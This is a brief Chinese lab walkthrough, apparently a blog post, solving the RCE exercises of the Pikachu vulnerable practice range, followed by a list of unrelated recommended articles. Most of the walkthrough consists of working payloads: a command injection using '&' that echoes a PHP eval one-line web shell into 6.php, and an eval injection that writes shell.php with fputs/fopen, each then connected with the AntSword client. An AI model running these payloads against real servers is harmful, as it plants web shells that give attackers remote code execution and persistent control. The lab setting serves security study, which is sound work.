Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
遇见火星1 天前
Nginx限流配置:防止接口被刷,服务器稳如泰山
运维·服务器·nginx
计算机安禾1 天前
【Linux从入门到精通】第49篇:服务器故障排查终极指南——思路决定出路
linux·运维·服务器
古月-一个C++方向的小白1 天前
Linux——初识文件
linux·运维·服务器
北山有鸟1 天前
编译香橙派内核
linux·运维·服务器
W.A委员会1 天前
Docker基本使用流程
运维·docker·容器
不会编程的懒洋洋1 天前
C# P/Invoke 基础
开发语言·c++·笔记·安全·机器学习·c#·p/invoke
小此方1 天前
Re:Linux系统篇(八)权限篇 ·三:深度解析从 umask 位运算到粘滞位的“权力锁”
linux·运维·服务器
晨曦夜月1 天前
进程的五大状态及特殊进程解析
linux·服务器·算法
时空系1 天前
第10篇:归属权与借用——Rust的安全保障 Rust中文编程
开发语言·安全·rust
Sarvartha1 天前
三目运算符
linux·服务器·前端